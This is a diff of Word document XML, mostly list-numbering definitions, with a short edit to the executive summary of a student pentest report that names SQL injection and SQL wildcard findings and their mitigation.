-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="7BF527B8"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="156AF4C4"/>
-    <w:lvl w:ilvl="0" w:tplc="6264F150">
+    <w:tmpl w:val="DAC2CA82"/>
+    <w:lvl w:ilvl="0" w:tplc="CC84724A">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="360" w:hanging="360"/>
+        <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -16392,7 +15159,7 @@
       <w:lvlText w:val="%2)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
+        <w:ind w:left="1560" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
@@ -16401,7 +15168,7 @@
       <w:lvlText w:val="%3."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
+        <w:ind w:left="1980" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
@@ -16410,7 +15177,7 @@
       <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
+        <w:ind w:left="2400" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
@@ -16419,7 +15186,7 @@
       <w:lvlText w:val="%5)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
+        <w:ind w:left="2820" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
@@ -16428,7 +15195,7 @@
       <w:lvlText w:val="%6."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
+        <w:ind w:left="3240" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
@@ -16437,7 +15204,7 @@
       <w:lvlText w:val="%7."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
+        <w:ind w:left="3660" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
@@ -16446,7 +15213,7 @@
       <w:lvlText w:val="%8)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
+        <w:ind w:left="4080" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
@@ -16455,18 +15222,448 @@
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
+        <w:ind w:left="4500" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="555A35FF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="812846B0"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="64212354"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="321EF54A"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6523477E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FA1E1858"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="65B93A87"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="25605A66"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="668D7AC4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0CC4FA40"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
         <w:ind w:left="3780" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="7D3F1F08"/>
+    <w:nsid w:val="7BF527B8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="880E24E4"/>
-    <w:lvl w:ilvl="0" w:tplc="6636965A">
+    <w:tmpl w:val="156AF4C4"/>
+    <w:lvl w:ilvl="0" w:tplc="6264F150">
       <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:ind w:left="360" w:hanging="360"/>
@@ -16548,23 +15745,112 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7D3F1F08"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="880E24E4"/>
+    <w:lvl w:ilvl="0" w:tplc="6636965A">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="2"/>
@@ -16573,22 +15859,25 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="13">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="14">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="10">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
-  <w:num w:numId="11">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="12">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="13">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="7"/>
+  <w:num w:numId="15">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -261,7 +261,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc71393713"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71399616"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -862,31 +862,53 @@
         </w:rPr>
         <w:t>and serious damage to the business reputation and they have to be mitigated before release.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve"> As for t</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>he low-risk vulnerability</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">The low-risk vulnerability, SQL wildcard attack, can be fixed along with the SQL injection. The medium-risk vulnerability, depending on the deadline and budgetary constraints, </w:t>
+        <w:t xml:space="preserve"> –</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>can be mitigated optionally with proper warnings displayed.</w:t>
+        <w:t xml:space="preserve"> SQL wildcard attack, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
